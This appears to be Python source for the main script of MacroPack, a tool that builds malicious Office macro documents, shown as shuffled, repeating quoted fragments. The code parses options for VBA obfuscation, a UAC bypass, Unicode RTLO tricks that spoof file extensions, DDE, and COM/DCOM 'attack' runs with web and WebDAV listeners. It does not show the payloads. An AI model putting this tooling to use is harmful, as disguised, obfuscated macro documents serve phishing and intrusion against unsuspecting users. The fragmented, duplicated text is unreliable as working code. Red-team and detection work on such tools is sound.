handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER,", "#Create temporary folder logging.info(\" [-] Temporary working dir: %s\" %", "= int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMinLen <", "\"dde\", \"print\", \"force-yes\", \"help\"] shortOptions= \"e:l:w:s:f:t:G:hqmop\" # only for Pro", "\"win32\": try: import win32com.client #@UnresolvedImport @UnusedImport except: print(\"Error: Could not", "not None: import time time.sleep(0.4) # Needed to avoid some", "logging.error(\" [!] Keyboard interrupt caught!\") logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory):", "from cmd line # running_from = psutil.Process(os.getpid()).parent().parent().name() # if running_from", "\"Pro\": generator = ContainerGenerator(mpSession) generator.run() #run com attack if mpSession.runTarget:", "or opt==\"--webdav-listen\": mpSession.Wlisten = True mpSession.WRoot = os.path.abspath(arg) elif opt", "opt==\"--template\": mpSession.template = arg elif opt == \"--listtemplates\": help.printTemplatesUsage(BANNER, sys.argv[0])", "else: # Create temporary work file if mpSession.fileInput is not", "fileExtension) # Append unicode RTLO to file name fileName +=", "except KeyboardInterrupt: logging.error(\" [!] Keyboard interrupt caught!\") logging.info(\" [+] Cleaning...\")", "inputFile) # Edit outputfile name to spoof extension if unicodeRtlo", "pro_modules.payload_builders.containers import ContainerGenerator from pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro from pro_core import", "stdin if not os.isatty(0): # check if something is being", "WListenServer(mpSession) Wlistener.run() except Exception: logging.exception(\" [!] Exception caught!\") except KeyboardInterrupt:", "opt==\"-s\" or opt==\"--start-function\": mpSession.startFunction = arg elif opt==\"-l\" or opt==\"--listen\":", "not mpSession.communityMode: payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession) else: payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession) #", "if sys.platform == \"win32\": longOptions.extend([\"run=\", \"run-visible\"]) opts, args = getopt.getopt(argv,", "logging.info(\" [-] Waiting for piped input feed...\") mpSession.stdinContent = sys.stdin.readlines()", "arg in opts: if opt in (\"-o\", \"--obfuscate\"): mpSession.obfuscateForm =", "is not None: # Check there are not binary chars", "Could not find output folder %s.\" % os.path.dirname(mpSession.outputFilePath)) sys.exit(2) if", "make Termcolor work on Windows too init() WORKING_DIR = \"temp\"", "Store input file...\") shutil.copy2(mpSession.fileInput, inputFile) if os.path.isfile(inputFile): logging.info(\" [-] Temporary", "'clear') # Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green')) logging.info(\" [+]", "check input args if mpSession.fileInput is None: # Argument not", "shutil.rmtree(working_directory) logging.info(\" Done!\\n\") sys.exit(0) if __name__ == '__main__': # check", "fileName logging.info(\" [-] File name modified to: %s\" % mpSession.outputFilePath)", "elif opt == \"--run\": if sys.platform == \"win32\": mpSession.runTarget =", "VERSION, MP_TYPE) try: longOptions = [\"embed=\", \"listen=\", \"port=\", \"webdav-listen=\", \"generate=\",", "import time time.sleep(0.4) # Needed to avoid some weird race", "in input fil if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\" [!] ERROR: Invalid", "== \"win32\": mpSession.ddeMode = True elif opt == \"--run\": if", "shortOptions += arg_mgt_pro.proArgsShortOptions # Only enabled on windows if sys.platform", "% mpSession.fileInput) sys.exit(2) else: logging.info(\" [-] Input file path: %s\"", "arg_mgt_pro.proArgsShortOptions # Only enabled on windows if sys.platform == \"win32\":", "sys.exit(2) #Create temporary folder logging.info(\" [-] Temporary working dir: %s\"", "path and extension (fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath) logging.info(\" [-] Extension", "int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMaxLen < 4", "[-] File name modified to: %s\" % mpSession.outputFilePath) # Retrieve", "if __name__ == '__main__': # check if running from explorer,", "# Build payload if payloadBuilder is not None: payloadBuilder.run() if", "args = getopt.getopt(argv, shortOptions, longOptions) # @UnusedVariable except getopt.GetoptError: help.printUsage(BANNER,", "= True elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-names\": mpSession.obfuscateNames", "opt == \"-e\" or opt== \"--embed\": mpSession.embeddedFilePath = os.path.abspath(arg) elif", "= os.path.splitext(mpSession.outputFilePath) logging.info(\" [-] Extension %s \" % fileExtension) #", "PayloadBuilderFactory from common import utils, mp_session, help from common.utils import", "modules.com_run import ComGenerator from modules.web_server import ListenServer from modules.Wlisten_server import", "work file if mpSession.fileInput is not None: # Check there", "want to spoof, such as \"jpg\" logging.info(\" [+] Inject %s", "else: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if logLevel == \"INFO\": os.system('cls' if", "#@UnresolvedImport @UnusedImport except: print(\"Error: Could not find win32com.\") sys.exit(1) MP_TYPE=\"Pro\"", "mp_session_pro else: MP_TYPE=\"Community\" from colorama import init from termcolor import", "== \"--force-yes\": mpSession.forceYes = True elif opt==\"--uac-bypass\": mpSession.uacBypass = True", "outputfile name to spoof extension if unicodeRtlo option is enabled", "if mpSession.outputFileType == MSTypes.UNKNOWN: logging.error(\" [!] %s is not a", "yes restart from cmd line # running_from = psutil.Process(os.getpid()).parent().parent().name() #", "formats.\" % os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else: logging.info(\" [-] Target output format:", "being piped logging.info(\" [-] Waiting for piped input feed...\") mpSession.stdinContent", "mpSession.obfuscatedNamesCharset = arg except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-minlen\":", "= True mpSession.listenRoot = os.path.abspath(arg) elif opt==\"--port\": mpSession.listenPort = int(arg)", "is enabled if mpSession.unicodeRtlo: # Reminder; mpSession.unicodeRtlo contains the extension", "from pro_modules.payload_builders.containers import ContainerGenerator from pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro from pro_core", "os.path.join(working_directory, utils.randomAlpha(9)) + \".vba\" if mpSession.stdinContent is not None: import", "logging.info(\" [-] Extension %s \" % fileExtension) # Append unicode", "You need to provide an output file! (get help using", "# if running_from == 'explorer.exe': # os.system(\"cmd.exe /k \\\"%s\\\"\" %", "with unicode RTLO\" % mpSession.unicodeRtlo) # Separate document path and", "cmd line # running_from = psutil.Process(os.getpid()).parent().parent().name() # if running_from ==", "if mpSession.stdinContent is not None: import time time.sleep(0.4) # Needed", "255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-strings\": mpSession.obfuscateStrings = True elif", "as \"jpg\" logging.info(\" [+] Inject %s false extension with unicode", "os.path.isfile(mpSession.outputFilePath): logging.error(\" [!] ERROR: Output file %s already exist!\" %", "server if mpSession.Wlisten: Wlistener = WListenServer(mpSession) Wlistener.run() except Exception: logging.exception(\"", "Build payload if payloadBuilder is not None: payloadBuilder.run() if MP_TYPE", "os.path.dirname(mpSession.outputFilePath)) sys.exit(2) if mpSession.outputFileType == MSTypes.UNKNOWN: logging.error(\" [!] %s is", "help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMinLen < 4 or mpSession.obfuscatedNamesMinLen >", "%s already exist!\" % mpSession.outputFilePath) sys.exit(2) #Create temporary folder logging.info(\"", "or opt==\"--help\": help.printUsage(BANNER, sys.argv[0]) sys.exit(0) else: if MP_TYPE == \"Pro\":", "unicode RTLO to file name fileName += '\\u202e' # Append", "(MP_TYPE != \"Pro\" or mpSession.dcomTarget is None): logging.error(\" [!] You", "% working_directory) if not os.path.exists(working_directory): os.makedirs(working_directory) try: # Create temporary", "psutil.Process(os.getpid()).parent().parent().name() # if running_from == 'explorer.exe': # os.system(\"cmd.exe /k \\\"%s\\\"\"", "view supported MacroPack formats.\" % os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else: logging.info(\" [-]", "so we can call input() later without triggering EOF #sys.stdin.close()", "else: if MP_TYPE == \"Pro\": arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER) else:", "format containing your VBA script.\" % mpSession.fileInput) logging.info(\" [+] Cleaning...\")", "Retrieve the right payload builder if mpSession.outputFileType != MSTypes.UNKNOWN: if", "mpSession.Wlisten = True mpSession.WRoot = os.path.abspath(arg) elif opt == \"-f\"", "import ContainerGenerator from pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro from pro_core import arg_mgt_pro,", "community mode (pro features not applied)\") MP_TYPE=\"Community\" else: arg_mgt_pro.verify(mpSession) #", "\"Pro\" and not mpSession.communityMode: payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession) else: payloadBuilder =", "to provide an output file! (get help using %s -h)\"", "+= arg_mgt_pro.proArgsShortOptions # Only enabled on windows if sys.platform ==", "MSTypes from common.definitions import VERSION, LOGLEVEL if sys.platform == \"win32\":", "opt == \"--force-yes\": mpSession.forceYes = True elif opt==\"--uac-bypass\": mpSession.uacBypass =", "if sys.platform == \"win32\": try: import win32com.client #@UnresolvedImport @UnusedImport except:", "help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-strings\": mpSession.obfuscateStrings = True elif opt==\"-s\"", "arg elif opt==\"-l\" or opt==\"--listen\": mpSession.listen = True mpSession.listenRoot =", "None: # Argument not supplied, try to get file content", "os.path.isfile(mpSession.fileInput): logging.error(\" [!] ERROR: Could not find %s!\" % mpSession.fileInput)", "Close Stdin pipe, so we can call input() later without", "[!] ERROR: Could not find %s!\" % mpSession.fileInput) sys.exit(2) else:", "sys.exit(2) else: logging.info(\" [-] Target output format: %s\" % mpSession.outputFileType)", "\"start-function=\",\"uac-bypass\", \"unicode-rtlo=\", \"dde\", \"print\", \"force-yes\", \"help\"] shortOptions= \"e:l:w:s:f:t:G:hqmop\" # only", "logLevel = \"WARN\" elif opt==\"-p\" or opt==\"--print\": mpSession.printFile = True", "== \"Pro\": generator = ContainerGenerator(mpSession) generator.run() #run com attack if", "os.path.exists(working_directory): os.makedirs(working_directory) try: # Create temporary work file. if mpSession.ddeMode", "== \"-f\" or opt== \"--input-file\": mpSession.fileInput = arg elif opt", "script.\" % mpSession.fileInput) logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) sys.exit(2)", "such as \"jpg\" logging.info(\" [+] Inject %s false extension with", "enabled on windows if sys.platform == \"win32\": longOptions.extend([\"run=\", \"run-visible\"]) opts,", "VERSION, MP_TYPE) else: mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE) try: longOptions", "elif opt==\"--obfuscate-names-charset\": try: mpSession.obfuscatedNamesCharset = arg except ValueError: help.printUsage(BANNER, sys.argv[0])", "# Separate document path and extension (fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath)", "we can call input() later without triggering EOF #sys.stdin.close() if", "in community mode (pro features not applied)\") MP_TYPE=\"Community\" else: arg_mgt_pro.verify(mpSession)", "opt==\"-q\" or opt==\"--quiet\": logLevel = \"WARN\" elif opt==\"-p\" or opt==\"--print\":", "if payloadBuilder is not None: payloadBuilder.run() if MP_TYPE == \"Pro\":", "fileExtension) = os.path.splitext(mpSession.outputFilePath) logging.info(\" [-] Extension %s \" % fileExtension)", "MP_TYPE=\"Pro\" if utils.checkModuleExist(\"pro_core\"): from pro_modules.utilities.dcom_run import DcomGenerator from pro_modules.payload_builders.containers import", "\"Pro\": arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER) else: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if", "if mpSession.obfuscatedNamesMaxLen < 4 or mpSession.obfuscatedNamesMaxLen > 255: help.printUsage(BANNER, sys.argv[0])", "time time.sleep(0.4) # Needed to avoid some weird race condition", "= sys.__stdin__ else: if not os.path.isfile(mpSession.fileInput): logging.error(\" [!] ERROR: Could", "else: MP_TYPE=\"Community\" from colorama import init from termcolor import colored", "or mpSession.template or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro):", "opt==\"--webdav-listen\": mpSession.Wlisten = True mpSession.WRoot = os.path.abspath(arg) elif opt ==", "\"command.cmd\") else: inputFile = os.path.join(working_directory, utils.randomAlpha(9)) + \".vba\" if mpSession.stdinContent", "== \"win32\": mpSession.runTarget = os.path.abspath(arg) elif opt == \"--run-visible\": if", "elif opt==\"--obfuscate-names-minlen\": try: mpSession.obfuscatedNamesMinLen = int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0])", "if mpSession.outputFileType != MSTypes.UNKNOWN: if MP_TYPE == \"Pro\" and not", "= DcomGenerator(mpSession) generator.run() # Activate Web server if mpSession.listen: listener", "elif opt==\"-w\" or opt==\"--webdav-listen\": mpSession.Wlisten = True mpSession.WRoot = os.path.abspath(arg)", "sys.argv[0]) sys.exit(0) else: if MP_TYPE == \"Pro\": arg_mgt_pro.processProArg(opt, arg, mpSession,", "ListenServer(mpSession) listener.run() # Activate WebDav server if mpSession.Wlisten: Wlistener =", "opt == \"--run-visible\": if sys.platform == \"win32\": mpSession.runVisible = True", "in (\"-G\", \"--generate\"): mpSession.outputFilePath = os.path.abspath(arg) elif opt == \"--listformats\":", "ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-minlen\": try: mpSession.obfuscatedNamesMinLen = int(arg)", "Colorama to make Termcolor work on Windows too init() WORKING_DIR", "extension # Append file extension fileName += fileExtension mpSession.outputFilePath =", "opt==\"--obfuscate-names\": mpSession.obfuscateNames = True elif opt==\"--obfuscate-names-charset\": try: mpSession.obfuscatedNamesCharset = arg", "folder %s.\" % os.path.dirname(mpSession.outputFilePath)) sys.exit(2) if mpSession.outputFileType == MSTypes.UNKNOWN: logging.error(\"", "# Prepend invisible space so filename does not end with", "[-] Store std input in file...\") f = open(inputFile, 'w')", "# Create temporary work file. if mpSession.ddeMode or mpSession.template or", "from colorama import init from termcolor import colored # {PyArmor", "ListenServer from modules.Wlisten_server import WListenServer from modules.payload_builder_factory import PayloadBuilderFactory from", "mpSession.fileInput is not None: # Check there are not binary", "WORKING_DIR = \"temp\" BANNER = help.getToolPres() def main(argv): global MP_TYPE", "int(arg) elif opt==\"--icon\": mpSession.icon = arg elif opt==\"-w\" or opt==\"--webdav-listen\":", "[-] Extension %s \" % fileExtension) # Append unicode RTLO", "and not mpSession.htaMacro): inputFile = os.path.join(working_directory, \"command.cmd\") else: inputFile =", "MP_TYPE == \"Pro\": mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE) else: mpSession", "== \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions += arg_mgt_pro.proArgsShortOptions # Only enabled on", "[!] You need to provide an output file! (get help", "opt == \"-f\" or opt== \"--input-file\": mpSession.fileInput = arg elif", "supplied, try to get file content from stdin if not", "= ContainerGenerator(mpSession) generator.run() #run com attack if mpSession.runTarget: generator =", "mpSession.obfuscateForm = True mpSession.obfuscateNames = True mpSession.obfuscateStrings = True mpSession.obfuscateDeclares", "# check input args if mpSession.fileInput is None: # Argument", "opt==\"-h\" or opt==\"--help\": help.printUsage(BANNER, sys.argv[0]) sys.exit(0) else: if MP_TYPE ==", "+ mpSession.unicodeRtlo[::-1] # Prepend invisible space so filename does not", "!= MSTypes.UNKNOWN: if MP_TYPE == \"Pro\" and not mpSession.communityMode: payloadBuilder", "explorer, if yes restart from cmd line # running_from =", "except Exception: logging.exception(\" [!] Exception caught!\") except KeyboardInterrupt: logging.error(\" [!]", "flagged extension # Append file extension fileName += fileExtension mpSession.outputFilePath", "win32com.\") sys.exit(1) MP_TYPE=\"Pro\" if utils.checkModuleExist(\"pro_core\"): from pro_modules.utilities.dcom_run import DcomGenerator from", "help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-minlen\": try: mpSession.obfuscatedNamesMinLen = int(arg) except", "to spoof in reverse order fileName += '\\u200b' + mpSession.unicodeRtlo[::-1]", "elif opt==\"--obfuscate-strings\": mpSession.obfuscateStrings = True elif opt==\"-s\" or opt==\"--start-function\": mpSession.startFunction", "# Reminder; mpSession.unicodeRtlo contains the extension we want to spoof,", "path: %s\" % mpSession.fileInput) if MP_TYPE == \"Pro\": if mpSession.communityMode:", "working dir: %s\" % working_directory) if not os.path.exists(working_directory): os.makedirs(working_directory) try:", "with flagged extension # Append file extension fileName += fileExtension", "mpSession.runTarget is None and (MP_TYPE != \"Pro\" or mpSession.dcomTarget is", "arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER) else: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if logLevel", "Stdin pipe, so we can call input() later without triggering", "spoof extension if unicodeRtlo option is enabled if mpSession.unicodeRtlo: #", "[!] Running in community mode (pro features not applied)\") MP_TYPE=\"Community\"", "temporary work file. if mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not", "%s!\" % mpSession.fileInput) sys.exit(2) else: logging.info(\" [-] Input file path:", "== \"win32\": sys.stdin = open(\"conIN$\") else: sys.stdin = sys.__stdin__ else:", "Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) sys.exit(2) logging.info(\" [-] Store input file...\")", "mp_session, help from common.utils import MSTypes from common.definitions import VERSION,", "# Append unicode RTLO to file name fileName += '\\u202e'", "logging.info(\" [-] File name modified to: %s\" % mpSession.outputFilePath) #", "if MP_TYPE == \"Pro\" and not mpSession.communityMode: payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession)", "MP_TYPE == \"Pro\" and not mpSession.communityMode: payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession) else:", "VERSION, LOGLEVEL if sys.platform == \"win32\": try: import win32com.client #@UnresolvedImport", "mpSession.outputFileType == MSTypes.UNKNOWN: logging.error(\" [!] %s is not a supported", "== \"INFO\": os.system('cls' if os.name == 'nt' else 'clear') #", "Running in community mode (pro features not applied)\") MP_TYPE=\"Community\" else:", "end with flagged extension # Append file extension fileName +=", "payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession) else: payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession) # Build payload", "import ListenServer from modules.Wlisten_server import WListenServer from modules.payload_builder_factory import PayloadBuilderFactory", "opt==\"--listen\": mpSession.listen = True mpSession.listenRoot = os.path.abspath(arg) elif opt==\"--port\": mpSession.listenPort", "if mpSession.listen: listener = ListenServer(mpSession) listener.run() # Activate WebDav server", "== \"--unicode-rtlo\": mpSession.unicodeRtlo = arg elif opt in (\"-G\", \"--generate\"):", "opts, args = getopt.getopt(argv, shortOptions, longOptions) # @UnusedVariable except getopt.GetoptError:", "input feed...\") mpSession.stdinContent = sys.stdin.readlines() # Close Stdin pipe, so", "mpSession.Wlisten: Wlistener = WListenServer(mpSession) Wlistener.run() except Exception: logging.exception(\" [!] Exception", "logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) sys.exit(2) logging.info(\" [-] Store", "utf-8 import os import sys import getopt import logging import", "\"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\", \"dde\", \"print\", \"force-yes\", \"help\"]", "[+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) sys.exit(2) logging.info(\" [-] Store input", "and not mpSession.communityMode: payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession) else: payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession)", "True elif opt==\"-s\" or opt==\"--start-function\": mpSession.startFunction = arg elif opt==\"-l\"", "== \"--run\": if sys.platform == \"win32\": mpSession.runTarget = os.path.abspath(arg) elif", "inputFile) if os.path.isfile(inputFile): logging.info(\" [-] Temporary input file: %s\" %", "'rb').read(1024)): logging.error(\" [!] ERROR: Invalid format for %s. Input should", "mpSession.fileInput) logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) sys.exit(2) logging.info(\" [-]", "= os.path.join(working_directory, \"command.cmd\") else: inputFile = os.path.join(working_directory, utils.randomAlpha(9)) + \".vba\"", "== \"--listtemplates\": help.printTemplatesUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"-q\" or opt==\"--quiet\": logLevel", "# Only enabled on windows if sys.platform == \"win32\": longOptions.extend([\"run=\",", "[+] Preparations...\") # check input args if mpSession.fileInput is None:", "ERROR: Could not find %s!\" % mpSession.fileInput) sys.exit(2) else: logging.info(\"", "logging.error(\" [!] You need to provide an output file! (get", "supported MacroPack formats.\" % os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else: logging.info(\" [-] Target", "file! (get help using %s -h)\" % os.path.basename(utils.getRunningApp())) sys.exit(2) if", "your VBA script.\" % mpSession.fileInput) logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory):", "\"-e\" or opt== \"--embed\": mpSession.embeddedFilePath = os.path.abspath(arg) elif opt==\"-t\" or", "(get help using %s -h)\" % os.path.basename(utils.getRunningApp())) sys.exit(2) if not", "verify that output file does not already exist if os.path.isfile(mpSession.outputFilePath):", "= arg elif opt==\"-l\" or opt==\"--listen\": mpSession.listen = True mpSession.listenRoot", "logging import shutil import psutil from modules.com_run import ComGenerator from", "if MP_TYPE == \"Pro\": #run dcom attack if mpSession.dcom: generator", "< 4 or mpSession.obfuscatedNamesMinLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif", "sys.argv[0]) sys.exit(0) elif opt==\"-q\" or opt==\"--quiet\": logLevel = \"WARN\" elif", "\"--force-yes\": mpSession.forceYes = True elif opt==\"--uac-bypass\": mpSession.uacBypass = True elif", "restart from cmd line # running_from = psutil.Process(os.getpid()).parent().parent().name() # if", "MP_TYPE == \"Pro\": generator = ContainerGenerator(mpSession) generator.run() #run com attack", "\"win32\": mpSession.runVisible = True elif opt == \"--force-yes\": mpSession.forceYes =", "%s\" % working_directory) if not os.path.exists(working_directory): os.makedirs(working_directory) try: # Create", "MP_TYPE == \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions += arg_mgt_pro.proArgsShortOptions # Only enabled", "\"input-file=\", \"encode\", \"obfuscate\", \"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\",", "mpSession.stdinContent is not None: import time time.sleep(0.4) # Needed to", "mpSession.communityMode: payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession) else: payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession) # Build", "longOptions.extend([\"run=\", \"run-visible\"]) opts, args = getopt.getopt(argv, shortOptions, longOptions) # @UnusedVariable", "logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green')) logging.info(\" [+] Preparations...\") # check", "@UnusedImport except: print(\"Error: Could not find win32com.\") sys.exit(1) MP_TYPE=\"Pro\" if", "sys.exit(2) if mpSession.outputFileType == MSTypes.UNKNOWN: logging.error(\" [!] %s is not", "termcolor import colored # {PyArmor Protection Code} # {PyArmor Plugins}", "need to provide an output file! (get help using %s", "generator = ComGenerator(mpSession) generator.run() if MP_TYPE == \"Pro\": #run dcom", "mpSession.embeddedFilePath = os.path.abspath(arg) elif opt==\"-t\" or opt==\"--template\": mpSession.template = arg", "mpSession.stdinContent = sys.stdin.readlines() # Close Stdin pipe, so we can", "opt == \"--listformats\": help.printAvailableFormats(BANNER) sys.exit(0) elif opt==\"-h\" or opt==\"--help\": help.printUsage(BANNER,", "\"--listtemplates\": help.printTemplatesUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"-q\" or opt==\"--quiet\": logLevel =", "file: %s\" % inputFile) # Edit outputfile name to spoof", "we want to spoof, such as \"jpg\" logging.info(\" [+] Inject", "if yes restart from cmd line # running_from = psutil.Process(os.getpid()).parent().parent().name()", "payload builder if mpSession.outputFileType != MSTypes.UNKNOWN: if MP_TYPE == \"Pro\"", "% mpSession.fileInput) if MP_TYPE == \"Pro\": if mpSession.communityMode: logging.warning(\" [!]", "if logLevel == \"INFO\": os.system('cls' if os.name == 'nt' else", "try: mpSession.obfuscatedNamesCharset = arg except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif", "%s. Input should be text format containing your VBA script.\"", "Done!\\n\") sys.exit(0) if __name__ == '__main__': # check if running", "Invalid format for %s. Input should be text format containing", "Keyboard interrupt caught!\") logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\"", "%s\" % inputFile) # Edit outputfile name to spoof extension", "arg elif opt == \"--listtemplates\": help.printTemplatesUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"-q\"", "= \"WARN\" elif opt==\"-p\" or opt==\"--print\": mpSession.printFile = True elif", "elif opt==\"-h\" or opt==\"--help\": help.printUsage(BANNER, sys.argv[0]) sys.exit(0) else: if MP_TYPE", "mpSession.listenRoot = os.path.abspath(arg) elif opt==\"--port\": mpSession.listenPort = int(arg) mpSession.WlistenPort =", "mpSession.obfuscatedNamesMinLen < 4 or mpSession.obfuscatedNamesMinLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0)", "temporary work file if mpSession.fileInput is not None: # Check", "import sys import getopt import logging import shutil import psutil", "to get file content from stdin if not os.isatty(0): #", "except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMaxLen < 4 or", "except: print(\"Error: Could not find win32com.\") sys.exit(1) MP_TYPE=\"Pro\" if utils.checkModuleExist(\"pro_core\"):", "= os.path.abspath(arg) elif opt == \"--listformats\": help.printAvailableFormats(BANNER) sys.exit(0) elif opt==\"-h\"", "elif opt == \"--run-visible\": if sys.platform == \"win32\": mpSession.runVisible =", "sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-minlen\": try: mpSession.obfuscatedNamesMinLen = int(arg) except ValueError:", "provide an output file! (get help using %s -h)\" %", "opt==\"--print\": mpSession.printFile = True elif opt == \"--dde\": if sys.platform", "shutil.copy2(mpSession.fileInput, inputFile) if os.path.isfile(inputFile): logging.info(\" [-] Temporary input file: %s\"", "mpSession.outputFilePath) sys.exit(2) #Create temporary folder logging.info(\" [-] Temporary working dir:", "[\"embed=\", \"listen=\", \"port=\", \"webdav-listen=\", \"generate=\", \"quiet\", \"input-file=\", \"encode\", \"obfuscate\", \"obfuscate-form\",", "= getopt.getopt(argv, shortOptions, longOptions) # @UnusedVariable except getopt.GetoptError: help.printUsage(BANNER, sys.argv[0])", "call input() later without triggering EOF #sys.stdin.close() if sys.platform ==", "feed...\") mpSession.stdinContent = sys.stdin.readlines() # Close Stdin pipe, so we", "or opt==\"--print\": mpSession.printFile = True elif opt == \"--dde\": if", "chars in input fil if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\" [!] ERROR:", "from modules.com_run import ComGenerator from modules.web_server import ListenServer from modules.Wlisten_server", "WORKING_DIR) if MP_TYPE == \"Pro\": mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE)", "else: arg_mgt_pro.verify(mpSession) # Check output file format if mpSession.outputFilePath: if", "MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro): inputFile = os.path.join(working_directory, \"command.cmd\") else: inputFile", "or opt==\"--quiet\": logLevel = \"WARN\" elif opt==\"-p\" or opt==\"--print\": mpSession.printFile", "mpSession.listen and not mpSession.Wlisten and mpSession.runTarget is None and (MP_TYPE", "modules.payload_builder_factory import PayloadBuilderFactory from common import utils, mp_session, help from", "a supported extension. Use --listformats to view supported MacroPack formats.\"", "enabled if mpSession.unicodeRtlo: # Reminder; mpSession.unicodeRtlo contains the extension we", "elif opt == \"--listtemplates\": help.printTemplatesUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"-q\" or", "working_directory = os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE == \"Pro\": mpSession =", "arg_mgt_pro, mp_session_pro else: MP_TYPE=\"Community\" from colorama import init from termcolor", "#sys.stdin.close() if sys.platform == \"win32\": sys.stdin = open(\"conIN$\") else: sys.stdin", "if MP_TYPE == \"Pro\": if mpSession.communityMode: logging.warning(\" [!] Running in", "(fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath) logging.info(\" [-] Extension %s \" %", "\"port=\", \"webdav-listen=\", \"generate=\", \"quiet\", \"input-file=\", \"encode\", \"obfuscate\", \"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\",", "= True elif opt == \"--dde\": if sys.platform == \"win32\":", "file name fileName += '\\u202e' # Append extension to spoof", "caught!\") logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\" Done!\\n\") sys.exit(0)", "is being piped logging.info(\" [-] Waiting for piped input feed...\")", "input() later without triggering EOF #sys.stdin.close() if sys.platform == \"win32\":", "os.name == 'nt' else 'clear') # Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()])", "Append file extension fileName += fileExtension mpSession.outputFilePath = fileName logging.info(\"", "= help.getToolPres() def main(argv): global MP_TYPE logLevel = LOGLEVEL #", "sys.exit(0) elif opt==\"--obfuscate-names-minlen\": try: mpSession.obfuscatedNamesMinLen = int(arg) except ValueError: help.printUsage(BANNER,", "windows if sys.platform == \"win32\": longOptions.extend([\"run=\", \"run-visible\"]) opts, args =", "logging.info(colored(BANNER, 'green')) logging.info(\" [+] Preparations...\") # check input args if", "common.utils import MSTypes from common.definitions import 